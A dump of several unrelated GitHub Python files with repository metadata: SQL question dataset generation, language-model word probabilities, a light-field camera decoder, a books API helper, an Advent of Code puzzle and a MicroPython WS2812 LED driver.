wikiSQLquestions,\n Tablefact: tablefactquestions,\n Msmarco: msmarcoquestions,\n WikiQA: wikiqaquestions,\n Coqa: coqaquestions,\n Quac: quacquestions,\n 
Dbdomainambiguous: dbdomainambiguousquestions,\n Dbdomainnotambiguous: dbdomainnotambiguousquestions,\n #Alex: alexquestions,\n Googlenq: googlenqquestions,\n Totto: tottoquestions,\n Wikitable: wikitablequestions,\n HybridQA: hybridQAquestions,\n Logicnlg: logicnlgquestions,\n Sparc: sparcquestions,\n Cosql: cosqlquestions,\n Alexa: alexaquestions,\n Cosqlnotambiguous: cosqlnotambiguousquestions\n }\n\n\n question_count = defaultdict(int)\n for datasetid in total_questions:\n dataset = total_questions[datasetid]\n for dbid in dataset:\n db = dataset[dbid]\n question_count[datasetid] += len(db)\n\n\n print(\"question_num:\")\n for datasetid in question_count:\n print(datasetid + \": \" + str(question_count[datasetid]))\n print(\"------------------\")\n\n #total_questions = filterquestion(totalq)\n\n trainq, devq, testq = splittype1question(total_questions)\n\n train_dataset = defaultdict(lambda : defaultdict(int))\n dev_dataset = defaultdict(lambda : defaultdict(int))\n test_dataset = defaultdict(lambda : defaultdict(int))\n\n train_question = defaultdict(lambda: defaultdict(int))\n dev_question = defaultdict(lambda: defaultdict(int))\n test_question = defaultdict(lambda: defaultdict(int))\n\n print(\"trainset:\")\n train_type1 = gen_type1(trainq, train_schema, train_dataset, train_question)\n print(\"type1 dataset: \" + str(dict(train_dataset[Type1])))\n print(\"type1 question: \" + str(dict(train_question[Type1])))\n train_type2 = gen_type2(total_questions, train_schema, train_dataset, train_question)\n print(\"type2 dataset: \" + str(dict(train_dataset[Type2])))\n print(\"type2 question: \" + str(dict(train_question[Type2])))\n train_type3 = gen_type3(total_questions, train_schema, train_dataset, train_question)\n print(\"type3 dataset: \" + str(dict(train_dataset[Type3])))\n print(\"type3 question: \" + str(dict(train_question[Type3])))\n train_type4 = gen_type4(total_questions, train_schema, train_dataset, train_question)\n print(\"type4 dataset: \" + str(dict(train_dataset[Type4])))\n print(\"type4 question: \" + str(dict(train_question[Type4])))\n train_type5 = gen_type5(total_questions, train_schema, train_dataset, train_question)\n print(\"type5 dataset: \" + str(dict(train_dataset[Type5])))\n print(\"type5 question: \" + str(dict(train_question[Type5])))\n mkdir(Train)\n write_json(train_type1, os.path.join(Train, Type1json))\n write_json(train_type2, os.path.join(Train, Type2json))\n write_json(train_type3, os.path.join(Train, Type3json))\n write_json(train_type4, os.path.join(Train, Type4json))\n write_json(train_type5, os.path.join(Train, Type5json))\n print(\"------------------\")\n\n print(\"devset:\")\n dev_type1 = gen_type1(devq, dev_schema, dev_dataset, dev_question)\n print(\"type1 dataset: \" + str(dict(dev_dataset[Type1])))\n print(\"type1 question: \" + str(dict(dev_question[Type1])))\n dev_type2 = gen_type2(total_questions, dev_schema, dev_dataset, dev_question)\n print(\"type2 dataset: \" + str(dict(dev_dataset[Type2])))\n print(\"type2 question: \" + str(dict(dev_question[Type2])))\n dev_type3 = gen_type3(total_questions, dev_schema, dev_dataset, dev_question)\n print(\"type3 dataset: \" + str(dict(dev_dataset[Type3])))\n print(\"type3 question: \" + str(dict(dev_question[Type3])))\n dev_type4 = gen_type4(total_questions, dev_schema, dev_dataset, dev_question)\n print(\"type4 dataset: \" + str(dict(dev_dataset[Type4])))\n print(\"type4 question: \" + str(dict(dev_question[Type4])))\n dev_type5 = gen_type5(total_questions, dev_schema, dev_dataset, dev_question)\n 
print(\"type5 dataset: \" + str(dict(dev_dataset[Type5])))\n print(\"type5 question: \" + str(dict(dev_question[Type5])))\n mkdir(Dev)\n write_json(dev_type1, os.path.join(Dev, Type1json))\n write_json(dev_type2, os.path.join(Dev, Type2json))\n write_json(dev_type3, os.path.join(Dev, Type3json))\n write_json(dev_type4, os.path.join(Dev, Type4json))\n write_json(dev_type5, os.path.join(Dev, Type5json))\n print(\"------------------\")\n\n print(\"testset:\")\n test_type1 = gen_type1(testq, test_schema, test_dataset, test_question)\n print(\"type1 dataset: \" + str(dict(test_dataset[Type1])))\n print(\"type1 question: \" + str(dict(test_question[Type1])))\n test_type2 = gen_type2(total_questions, test_schema, test_dataset, test_question)\n print(\"type2 dataset: \" + str(dict(test_dataset[Type2])))\n print(\"type2 question: \" + str(dict(test_question[Type2])))\n test_type3 = gen_type3(total_questions, test_schema, test_dataset, test_question)\n print(\"type3 dataset: \" + str(dict(test_dataset[Type3])))\n print(\"type3 question: \" + str(dict(test_question[Type3])))\n test_type4 = gen_type4(total_questions, test_schema, test_dataset, test_question)\n print(\"type4 dataset: \" + str(dict(test_dataset[Type4])))\n print(\"type4 question: \" + str(dict(test_question[Type4])))\n test_type5 = gen_type5(total_questions, test_schema, test_dataset, test_question)\n print(\"type5 dataset: \" + str(dict(test_dataset[Type5])))\n print(\"type5 question: \" + str(dict(test_question[Type5])))\n mkdir(Test)\n write_json(test_type1, os.path.join(Test, Type1json))\n write_json(test_type2, os.path.join(Test, Type2json))\n write_json(test_type3, os.path.join(Test, Type3json))\n write_json(test_type4, os.path.join(Test, Type4json))\n write_json(test_type5, os.path.join(Test, Type5json))\n print(\"------------------\")\n\n #get_stat(train_question, test_question, dev_question)\n\n end = time.time()\n print(end - start)\n\n","repo_name":"chatc/TriageSQL","sub_path":"gen_data/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":18010,"program_lang":"python","lang":"en","doc_type":"code","stars":29,"dataset":"github-code","pt":"67"} +{"seq_id":"1122608563","text":"\n# -*- coding: utf-8 -*-\n\"\"\"\nSpyder Editor\n\nThis is a temporary script file.\n\"\"\"\n\nimport data\nimport argparse\nimport torch\nimport os\n\nparser = argparse.ArgumentParser(description='PyTorch Wikitext-2 RNN/LSTM Language Model')\nparser.add_argument('--input',type=str, default='./data',\n help='path leading to the directory that contains input text files')\nparser.add_argument('--data', type=str, default='./data',\n help='location of the data corpus')\nparser.add_argument('--outf', type=str, default='output.tsv',\n help='tsv output file to store probabilities')\nparser.add_argument('--checkpoint', type=str, default='./model.pt',\n help='saved model to be loaded,checkpoint saved during training')\nparser.add_argument('--cuda', action='store_true',\n help='use CUDA')\n#parser.add_argument('--bptt', type=int, default=1,\n# help='sequence length')\nargs = parser.parse_args()\nif torch.cuda.is_available():\n if not args.cuda:\n print(\"WARNING: You have a CUDA device, so you should probably run with --cuda\")\n\ndevice = torch.device(\"cuda\" if args.cuda else \"cpu\")\n\n# create vocab\ncorpus = data.Corpus(args.data)\nntokens = len(corpus.dictionary)\n\n# initialize required parameters here\neval_batch_size = 1\nsoftmax = torch.nn.Softmax(dim = -1)\n\nwith open(args.checkpoint, 'rb') as f:\n model = 
torch.load(f, map_location='cpu').to(device)\n\nis_transformer_model = hasattr(model, 'model_type') and model.model_type == 'Transformer'\n\ndef get_index(word):\n    if word in corpus.dictionary.word2idx:\n        #print(corpus.dictionary.word2idx[word])\n        return corpus.dictionary.word2idx[word]\n    else:\n        # NB: the token literal here was stripped during extraction; \"<unk>\" is the\n        # conventional unknown-word token and is restored as an assumption.\n        return corpus.dictionary.word2idx[\"<unk>\"]\n\ndef batchify(data, bsz):\n    # Work out how cleanly we can divide the dataset into bsz parts.\n    nbatch = data.size(0) // bsz\n    # Trim off any extra elements that wouldn't cleanly fit (remainders).\n    data = data.narrow(0, 0, nbatch * bsz)\n    # Evenly divide the data across the bsz batches.\n    data = data.view(bsz, -1).t().contiguous()\n    #print(data.shape)\n    return data.to(device)\n\n'''def get_batch(source, i):\n    seq_len = min(args.bptt, len(source) - 1 - i)\n    data = source[i:i+seq_len]\n    target = source[i+1:i+1+seq_len].view(-1)\n    return data, target\n'''\ndef repackage_hidden(h):\n    \"\"\"Wraps hidden states in new Tensors, to detach them from their history.\"\"\"\n\n    if isinstance(h, torch.Tensor):\n        return h.detach()\n    else:\n        return tuple(repackage_hidden(v) for v in h)\n\ndef text_to_word_ids(path):\n    # indentation normalized to spaces; the original mixed tabs and spaces, which is a TabError in Python 3\n    with open(path, 'r', encoding=\"utf8\") as f:\n        idss = []\n        for line in f:\n            words = line.split()\n            ids = []\n            for word in words:\n                ids.append(get_index(word))\n            idss.append(torch.tensor(ids).type(torch.int64))\n        ids = torch.cat(idss)\n    return ids\n\ndef prepare_data(path):\n    ids_list = text_to_word_ids(path)\n    test_data = batchify(ids_list, eval_batch_size)\n    return test_data\n\ndef get_probability(input_filepath, output_filepath):\n\n    input_data = prepare_data(input_filepath)\n\n    # Turn on evaluation mode which disables dropout.\n    model.eval()\n\n    if not is_transformer_model:\n        hidden = model.init_hidden(eval_batch_size)\n\n    with torch.no_grad(), open(output_filepath, 'w') as outfile, open(input_filepath, 'r', encoding=\"utf8\") as inputfile:\n\n        i = 0\n        line_id = -1\n        outfile.write(\"\\nLINE_NUMBER\\t\\t\\tWORD_INDEX\\t\\t\\tPROBABILITY\\n\")\n\n        for line in inputfile:\n\n            line_id += 1\n            words = line.split() #+ ['<eos>'] (token literal restored; it was stripped during extraction)\n\n            seq_len = len(words)\n\n            if seq_len > 0:\n                data = input_data[i:i+seq_len]\n\n                if is_transformer_model:\n                    output = model(data)\n                else: #output is linear o/p of shape seq_len,batch,ntoken\n                    output, hidden = model(data, hidden) #encode o/p seq_len, batch, num_directions * hidden_size,linear o/p se\n                    hidden = repackage_hidden(hidden)\n                #print(output.shape)\n                #print(output)\n                probabilities = softmax(output)\n\n                for j, wrd_idx in enumerate(data): #target\n\n                    wrd_prob = probabilities[j,0,wrd_idx].item()\n                    #print(wrd_prob)\n                    #print(\"word=\",wrd_idx,\"output_idx:\",output[j,0,wrd_idx])\n\n                    outfile.write(\"\\n\\t\") #Line {}\\t\\tword_pos:{}\\t\\tprobability:{0:.2f}\".format(line_id, wrd_idx,wrd_prob))\n                    outfile.write(str(line_id))\n                    outfile.write(\"\\t\\t\\t\")\n                    outfile.write(str(j))\n                    outfile.write(\"\\t\\t\\t\\t\")\n                    outfile.write(str(round(wrd_prob,5)))\n                i = i + seq_len\n\n\n##### check input file path and create output filepath for saving probabilities ######\n\n#### for wikitext folder containing train,valid and test data, to use only test data\n\nif args.input == './data':\n\n    input_path = os.path.join(args.input, 'test.txt')\n\n    output_directory = os.path.splitext(os.path.basename(args.checkpoint))[0]+\"_output\"\n\n    if not os.path.exists(output_directory):\n        os.makedirs(output_directory)\n\n    output_path = os.path.join(output_directory,os.path.splitext(os.path.basename(args.input))[0]+\".tsv\")\n    get_probability(input_path,output_path)\n\nelse:\n    
###### for other input directories with multiple text files\n\n # get input directory\n dir_name = args.input\n input_directory = os.fsencode(args.input)\n\n # create appropriate output folder for a particular model using saved model name\n out_dir = os.path.splitext(os.path.basename(args.checkpoint))[0]+\"_output\"\n sub_dir = os.path.splitext(os.path.basename(args.input))[0]+\"_output\"\n\n output_directory = os.path.join(out_dir,sub_dir)\n\n if not os.path.exists(output_directory):\n os.makedirs(output_directory)\n\n #print(output_directory)\n for file in os.listdir(input_directory):\n filename = os.fsdecode(file)\n #print(os.path.join(directory_in_str, filename))\n if filename.endswith(\".txt\"):\n input_path = os.path.join(args.input, filename)\n output_path =os.path.join(output_directory,os.path.splitext(os.path.basename(filename))[0]+\".tsv\")\n get_probability(input_path,output_path)\n","repo_name":"sne265/work","sub_path":"Neural Language model/probability.py","file_name":"probability.py","file_ext":"py","file_size_in_byte":6528,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"8495185853","text":"import gc\nimport joblib\nimport numpy as np\nfrom matplotlib import tri as mtri\nfrom scipy import interpolate\nfrom skimage import img_as_float\n\nimport plenpy.logg\nfrom plenpy import lightfields as lf\nfrom plenpy.utilities import demosaic\nfrom plenpy.utilities import images\n\nlogger = plenpy.logg.get_logger()\n\n__all__ = ['GenericLightFieldCamera']\n\n\n# TODO: Needs a redo. A lot has changed, yet this implementation has not...\n# Relies on old methods of AbstractLightFieldCamera...\nraise NotImplementedError\n\n\nclass GenericLightFieldCamera(AbstractLightFieldCamera):\n \"\"\"Generic light field camera.\n\n This camera class can be used to calibrate and decode generic light\n field cameras. That is, microlens based cameras with either hexagonal\n or rectangular microlens array. The calibration is solely done via\n whiteimages, which have to be stored in the ``Calibration`` folder.\n The camera calculates decoded images as a\n :class:`.plenpy.lightfields.lightfield.LightField` object.\n\n The class does not add any attributes to the\n :class:`AbstractLightFieldCamera` base class.\n\n \"\"\"\n\n def __init__(self, path: Any, microlens_size: float):\n \"\"\":class:`GenericLightFieldCamera` class initialization.\n\n See Also:\n The camera uses the :class:`AbstractLightFieldCamera` base class\n initialization.\n\n \"\"\"\n super().__init__(path=path,\n microlens_size=microlens_size)\n\n return\n\n def calibrate(self,\n demosaic_method: Optional[str] = None,\n pattern: Optional[str] = None,\n force: bool = False):\n \"\"\"Calibration of the LightFieldCamera.\n\n The basic calibration pipeline is:\\n\n * Calculate an ideal white image\n * Calculate the microlens centers\n\n Args:\n demosaic_method : Method used to calculate the demosaiced image.\n If ``None`` is specified, no demosaicing is performed. For\n available methods\n see :func:`plenpy.utilities.demosaic.get_demosaiced()`.\n\n pattern: Bayer filter pattern that the input image is modulated\n with. 
Only used if image is being demosaiced.\n\n force: If set to ``True``, force the recalibration,\n even if a calibration file is found.\n Overwrites the calibration file.\n\n \"\"\"\n logger.info(\"Calibrating camera...\")\n # If a calibration file is found, load it\n if (self.path / self._calDataFilename).is_file() and not force:\n logger.info(\n \"Found calibration data in '{}'. \"\n \"Reading from calibration file.\".format(\n self.calibrationFolderPath))\n self._load_cal_data()\n\n else:\n self._calc_ideal_whiteimage(demosaic_method=demosaic_method,\n pattern=pattern)\n self._calc_microlens_centers()\n self._isCalibrated = True\n\n # If no calibration file is there, save it\n if not (self.path / self._calDataFilename).is_file() or force:\n logger.info(\"Saving compressed calibration data...\")\n self._save_cal_data()\n\n self._isCalibrated = True\n logger.info(\"... done.\")\n gc.collect()\n return\n\n def decode_sensor_image(self,\n num: int,\n demosaic_method: Optional[str] = None,\n pattern: Optional[str] = None,\n multithreading: int = 0):\n \"\"\"Decode the specified sensor image.\n\n The decoding gives a\n :class:`.plenpy.lightfields.lightfield.LightField` object that is\n added the objects dictionary of decoded images.\n\n Args:\n num: Number of the sensor image that is to be decoded.\n\n demosaic_method : Method used to calculate the demosaiced image.\n If ``None`` is specified, no demosaicing is performed. For\n available methods and default value,\n see :func:`plenpy.utilities.demosaic.get_demosaiced()`.\n\n pattern: Bayer filter pattern that the input image is modulated\n with. Only used if image is being demosaiced.\n\n multithreading: Specify number of parallel threads.\n If ``0`` is specified, no multithreading is applied. Caution:\n The multithreading implementation is very heavy on RAM.\n Default: 0\n\n \"\"\"\n logger.info(\"Decoding sensor image number {}...\".format(num))\n\n # Check multithreading option:\n if not isinstance(multithreading, int) or multithreading < 0:\n raise ValueError(\n f\"Multithreading option {multithreading} is not an integer. 
\"\n \"Please specify a positive integer value.\")\n\n # Get sensor image in shape (x, y, N)\n raw_img = self.get_sensor_image(num)\n\n if demosaic_method is not None:\n # Demosaic sensor image\n logger.info(\n f\"Demosaicing sensor image using {pattern} pattern...\")\n img = demosaic.get_demosaiced(np.squeeze(raw_img),\n pattern=pattern,\n method=demosaic_method)\n\n logger.info(\"...done.\")\n\n else:\n img = raw_img\n\n # Convert to float\n img = img_as_float(img, raw_img.dtype)\n del raw_img\n\n # Calculate interpolation object\n interp = self._calc_interp_image(img)\n\n # Initialize light field data\n lf_s = int(img.shape[0] / self._microlensSize)\n lf_t = int(img.shape[1] / self._microlensSize)\n lf_u = self._microlensSize\n lf_v = self._microlensSize\n num_channels = interp.size\n\n # Garbage collection to free up memory\n gc.collect()\n del img\n\n lf_data = np.zeros((lf_u, lf_v, lf_s, lf_t, num_channels)).astype(\n np.float64)\n\n if multithreading == 0:\n # Calculate light field serially, no multithreading.\n for u in range(-self._microlensRadius, self._microlensRadius + 1):\n for v in range(-self._microlensRadius,\n self._microlensRadius + 1):\n logger.info(\n \"Calculating subaperture \"\n \"#({},{}) of ({},{})...\".format(\n u + self._microlensRadius,\n v + self._microlensRadius,\n self._microlensSize,\n self._microlensSize))\n\n img = self._calc_subaperture(\n interp=interp, x=u, y=v, method=\"linear\")\n\n lf_data[u + self._microlensRadius,\n v + self._microlensRadius,\n :, :, :] = img\n\n # Garbage collection to free up memory\n gc.collect()\n\n logger.info(\"...done #({},{}).\".format(\n u + self._microlensRadius,\n v + self._microlensRadius\n ))\n\n del img\n\n else:\n # Calculate subaperture clusters in parallel\n img_clusters = joblib.Parallel(\n n_jobs=multithreading)\\\n (joblib.delayed(self._decode_cluster_parallel)(interp, x)\n for x in range(-self._microlensRadius,\n self._microlensRadius + 1))\n\n # copy clusters to LF data\n for i in range(0, len(img_clusters[0])):\n lf_data[i, :, :, :, :] = img_clusters[i]\n\n # delete clusters\n del img_clusters\n\n # Create LightField object from data\n decoded = lf.LightField(lf_data)\n del lf_data\n\n # Add decoded image to _decodedImages dictionary\n self._add_decoded_image(decoded, num)\n logger.info(\"...done.\")\n return\n\n @staticmethod\n def _calc_interp_image(img: ndarray) -> ndarray:\n \"\"\"Calculate an interpolation of the raw sensor image using the\n microlens center's Delaunay triangulation.\n\n Args:\n img: Input image to interpolate\n\n Returns:\n Array of :class:`scipy.interpolate.RectBivariateSpline`\n Inteprolation object of the scipy package.\n\n \"\"\"\n logger.info(\"Calculating interpolation object...\")\n\n raw_img = img.copy()\n num_x, num_y, num_ch = raw_img.shape\n\n data_points_x = range(0, num_x)\n data_points_y = range(0, num_y)\n\n # Create empty array of interpolated images\n interp_image = []\n for i in range(0, num_ch):\n interp_image.append(None)\n interp_image = np.array(interp_image)\n\n # Interpolate all color channels independently\n for i in range(0, num_ch):\n data = raw_img[:, :, i]\n\n # Save interpolation as array\n interp_image[i] = interpolate.RectBivariateSpline(\n data_points_x,\n data_points_y,\n data)\n del data\n\n logger.info(\"...done.\")\n del raw_img\n return interp_image\n\n def _calc_subaperture(self,\n interp: ndarray,\n x: int,\n y: int,\n method: str = 'cubic') -> ndarray:\n \"\"\"Calculate a subaperture view from the raw sensor data.\n\n Args:\n interp : ndarray of 
:class:`scipy.interpolate.RectBivariateSpline`\n\n x: Distance from the microlens center in x-direction in pixels.\n\n y: Distance from the microlens center in y-direction in pixels.\n\n method: Used interpolation method. Available methods are:\n 'bilinear', 'cubic'. Default: 'cubic'.\n\n Returns:\n The calculated subaperture image.\n \"\"\"\n\n interp_param_list = [\"cubic\", \"linear\"]\n\n num_channels = interp.size\n\n if method not in interp_param_list:\n raise ValueError(\n f\"Specified method '{method}' is not one of the \"\n \"recognized methods: {interp_param_list}\")\n\n logger.debug(\n \"Calculating subaperture with x = {} and y = {}...\".format(x, y))\n\n # Calculate interpolation coordinates by given distance x and y\n interp_coordinates = np.asarray(self._microlensCenters)\n interp_coordinates_x = interp_coordinates[:, 0] + x\n interp_coordinates_y = interp_coordinates[:, 1] + y\n\n # Do a Delaunay triangulation of the interpolation points\n logger.debug(\"Calculating Delaunay triangulation of \"\n \"subaperture interpolation points....\")\n triang = mtri.Triangulation(interp_coordinates_x, interp_coordinates_y)\n logger.debug(\"...done.\")\n\n # Get size of the original image from interp object\n x_max = int(interp[0].tck[0].max() + 1)\n y_max = int(interp[0].tck[1].max() + 1)\n\n # Size of subaperture image\n s_max = int(x_max/self._microlensSize)\n t_max = int(y_max/self._microlensSize)\n\n # Rectangular grid for final image\n xi, yi = np.meshgrid(\n np.linspace(0, x_max, s_max),\n np.linspace(0, y_max, t_max))\n\n # Initialize final image\n subaperture_image = np.zeros((s_max, t_max, num_channels),\n dtype=np.float64)\n\n # Check if (x,y) coordinates are still inside microlens,\n # if not, return black image\n # if x**2 + y**2 > self._microlensRadius**2:\n # return subaperture_image\n\n # Iterate over image channels and fill final image\n for i in range(0, num_channels):\n logger.debug(\"Interpolating subaperture image channel {}.\".format(\n i))\n\n # Do a cubic interpolation on the triangular grid\n if method == \"cubic\":\n interp_geom = mtri.CubicTriInterpolator(\n triang,\n interp[i].ev(interp_coordinates_x,\n interp_coordinates_y),\n kind='geom')\n\n # Alternatively, do a linear interpolation\n elif method == \"linear\":\n interp_geom = mtri.LinearTriInterpolator(\n triang,\n interp[i].ev(interp_coordinates_x,\n interp_coordinates_y))\n\n subaperture_image[:, :, i] = np.flipud(np.rot90(\n interp_geom(xi, yi)))\n\n logger.debug(\"...done.\")\n del interp_geom\n logger.debug(\"...done.\")\n return np.squeeze(np.nan_to_num(subaperture_image))\n\n def _decode_cluster_parallel(self,\n interp: ndarray,\n x: int) -> ndarray:\n \"\"\"Decode a cluster of subaperture views.\n\n Args:\n interp: Array of RectBivariateSpline interpolation objects\n to calculate the subaperture view.\n\n x: Coordinate of the cluster in pixels. 
Here, x specifies the\n distance from the microlens centers in x-direction.\n\n Returns:\n The subaperture views of the cluster.\n\n \"\"\"\n gc.collect()\n\n # Get size of the original image from interp object\n x_max = int(interp[0].tck[0].max() + 1)\n y_max = int(interp[0].tck[1].max() + 1)\n\n u_max = self._microlensSize\n v_max = self._microlensSize\n\n s_max = int(x_max / self._microlensSize)\n t_max = int(y_max / self._microlensSize)\n\n num_channels = interp.size\n\n logger.info(\"Calculating subaperture cluster \"\n f\"#{x + self._microlensRadius + 1} of {u_max}...\")\n\n # calculate one raw (u=const) of subaperture views\n res = np.zeros((v_max, s_max, t_max, num_channels))\n for y in range(-self._microlensRadius, self._microlensRadius + 1):\n img = self._calc_subaperture(\n interp=interp, x=x, y=y, method=\"linear\")\n\n res[y + self._microlensRadius,\n :, :\n :] = images.get_standard_shape(img)\n gc.collect()\n del img\n\n logger.info(f\"...done #{x + self._microlensRadius + 1} of {u_max}.\")\n\n del interp\n return res\n\n def _get_wi_db_entry(self, path: str, metadata: Dict) -> Optional[ndarray]:\n \"\"\"Get a entry for the white image database.\n\n For the generic camera, no metadata is available.\n\n Returns:\n None\n\n \"\"\"\n\n return None\n","repo_name":"themathgeek13/plenpy","sub_path":"plenpy/cameras/generic_lightfield_camera.py","file_name":"generic_lightfield_camera.py","file_ext":"py","file_size_in_byte":14796,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"67"} +{"seq_id":"25524451431","text":"from app import app\nimport urllib.request,json\nfrom .models import book\n\nBook= book.Book\n\n#getting api key\n\nkey=app.config['BOOK_API_KEY']\nbase_url=app.config['BOOK_API_BASE_URL']\n\n\ndef get_books(gifted):\n '''\n Funstion that gets the json to our url request\n '''\n get_books_url=base_url.format(volumes,key)\n with urllib.request.urlopen(get_books_url) as url:\n get_books_data=url.read()\n get_books_response=json.loads(get_books_data)\n book_results=None\n \n if get_books_response['items']:\n book_results_list=get_books_response['items']\n book_results=process_results(book_results_list)\n \n \n return book_results\n\n\n\ndef process_results(book_results):\n \n bookList=[]\n bookDict={}\n for result in book_results:\n volumeInfo=result['volumeInfo']\n bookDict['title']=volumeInfo['title']\n if 'imageLinks' in volumeInfo:\n bookDict['image'] = volumeInfo['imageLinks']['thumbnail'] \n bookDict['pageCount'] = volumeInfo.get('pageCount', 'not available') \n bookDict['previewLink'] = volumeInfo.get('previewLink', 'not available')\n \n if 'authors' in result['volumeInfo']:\n bookDict['authors'] = \", \".join(volumeInfo['authors'])\n else:\n bookDict['authors'] = 'Unknown'\n \n if 'publishedDate' in volumeInfo:\n bookDict['publishedDate'] = volumeInfo['publishedDate'][:4]\n else:\n bookDict['publishedDate'] = 'missing'\n \n if 'description' in volumeInfo:\n description = volumeInfo['description'][:700] \n if len(volumeInfo['description']) <= 700:\n bookDict['description'] = description\n else:\n bookDict['description'] = description + \" '...'\" \n else:\n \n bookDict['description'] = \"No description available\" \n \n \n bookList.append(bookDict)\n \n \n # bookDict = {} \n # extractDict['bookList'] = sortByPublishedDate(bookList)\n \n # extractDict['displayCount'] = len(bookList)\n print(bookList)\n \n return bookList\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n 
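# --- editor's note (added): get_books() above references an undefined name 'volumes' and never\n# uses its 'gifted' argument, so it cannot run as written. Below is a hedged corrected sketch;\n# 'get_books_by_query' is a hypothetical name, and it assumes base_url takes a query term plus\n# the API key, which matches how get_books_url is built above. ---\ndef get_books_by_query(query):\n    '''Search the books API for `query` and return processed results (sketch).'''\n    get_books_url = base_url.format(query, key)\n    with urllib.request.urlopen(get_books_url) as url:\n        get_books_response = json.loads(url.read())\n    book_results = None\n    if get_books_response.get('items'):\n        book_results = process_results(get_books_response['items'])\n    return book_results\n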
\n\n","repo_name":"PatrickNgare/BookApi","sub_path":"app/request.py","file_name":"request.py","file_ext":"py","file_size_in_byte":2540,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"3493383571","text":"def load_input(source=\"input.txt\"):\n with open(source, 'r') as file:\n data = [[y for y in x.strip().split(\" = \")] for x in file.readlines()]\n for x in range(len(data)):\n if data[x][0][:3] == \"mem\":\n data[x][0] = int(data[x][0][4:-1])\n data[x][1] = int(data[x][1])\n else:\n data[x] = data[x][1]\n return data\n\ndef binify(num):\n return bin(num)[2:].zfill(36)\n\ndef intify(bin_str):\n return int(bin_str, 2)\n\ndef apply_mask(bin_str, mask):\n result = []\n for x in range(len(mask)):\n if mask[x] != \"X\":\n result.append(mask[x])\n else:\n result.append(bin_str[x])\n return \"\".join(result)\n\ndef first_star(data):\n mem = {}\n mask = None\n for cmd in data:\n if type(cmd) == str:\n mask = cmd\n else:\n mem[cmd[0]] = intify(apply_mask(binify(cmd[1]), mask))\n return sum(mem.values())\n\ndef get_combinations(num):\n nums = []\n for i in range(0, 2**num):\n b = bin(i)[2:]\n nums.append(str(b).zfill(num))\n return nums\n \ndef get_mem_variations(mask, address):\n result = []\n # put the nums in\n for x in range(len(mask)):\n if mask[x] != \"X\":\n if mask[x] == \"1\":\n result.append(\"1\")\n else:\n result.append(address[x])\n else:\n result.append(address[x])\n \n result = \"\".join(result)\n print(address)\n print(mask)\n print(result)\n # Get the possible x options\n x = get_combinations(mask.count(\"X\"))\n results = []\n \n # for possible variation set\n for vari in x:\n index = 0\n temp = []\n for l in mask:\n if l == \"X\":\n temp.append(vari[index])\n index += 1\n else:\n temp.append(l)\n temp = \"\".join(temp)\n results.append(temp)\n \n return results\n\ndef second_star(data):\n mem = {}\n mask = None\n for cmd in data:\n if type(cmd) == str:\n mask = cmd\n else:\n addresses = get_mem_variations(mask, binify(cmd[0]))\n for x in addresses:\n mem[intify(x)] = cmd[1]\n print(mem)\n \ndef solution(source):\n data = load_input(source)\n print(\"Day 14\")\n print(\"First star:\", str(first_star(data.copy())))\n print(\"Second star:\", str(second_star(data.copy())))\n print(\"-------------------------------------\")\n\nif __name__ == \"__main__\":\n solution(\"input.txt\")\n","repo_name":"Peritract/adventofcode","sub_path":"2020/day_14.py","file_name":"day_14.py","file_ext":"py","file_size_in_byte":2503,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"41452339412","text":"# Example using PIO to drive a set of WS2812 LEDs.\n\nimport array\nimport time\n\nimport rp2\nfrom machine import Pin\n\n# -----------------------------------------------\n# add type hints for the rp2.PIO Instructions\nfrom typing_extensions import TYPE_CHECKING # type: ignore\n\nif TYPE_CHECKING:\n from rp2.asm_pio import *\n# -----------------------------------------------\n# Configure the number of WS2812 LEDs.\nNUM_LEDS = 8\n\n\n@rp2.asm_pio(sideset_init=rp2.PIO.OUT_LOW, out_shiftdir=rp2.PIO.SHIFT_LEFT, autopull=True, pull_thresh=24)\ndef ws2812():\n T1 = 2\n T2 = 5\n T3 = 3\n wrap_target()\n label(\"bitloop\")\n out(x, 1) .side(0) [T3 - 1]\n jmp(not_x, \"do_zero\") .side(1) [T1 - 1]\n jmp(\"bitloop\") .side(1) [T2 - 1]\n label(\"do_zero\")\n nop() .side(0) [T2 - 1]\n wrap()\n\n\n# Create the StateMachine with the ws2812 program, outputting on Pin(22).\nsm = rp2.StateMachine(0, 
ws2812, freq=8_000_000, sideset_base=Pin(22))\n\n# Start the StateMachine, it will wait for data on its FIFO.\nsm.active(1)\n\n# Display a pattern on the LEDs via an array of LED RGB values.\nar = array.array(\"I\", [0 for _ in range(NUM_LEDS)])\n\n# Cycle colours.\nfor i in range(4 * NUM_LEDS):\n    for j in range(NUM_LEDS):\n        r = j * 100 // (NUM_LEDS - 1)\n        b = 100 - j * 100 // (NUM_LEDS - 1)\n        if j != i % NUM_LEDS:\n            r >>= 3\n            b >>= 3\n        ar[j] = r << 16 | b  # type: ignore\n    sm.put(ar, 8)\n    time.sleep_ms(50)\n\n# Fade out.\nfor i in range(24):\n    for j in range(NUM_LEDS):\n        ar[j] >>= 1  # type: ignore\n    sm.put(ar, 8)\n    time.sleep_ms(50)\n","repo_name":"Josverl/PIO_ASM_typing","sub_path":"src/pio/pio_ws2812.py","file_name":"pio_ws2812.py","file_ext":"py","file_size_in_byte":1636,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"}
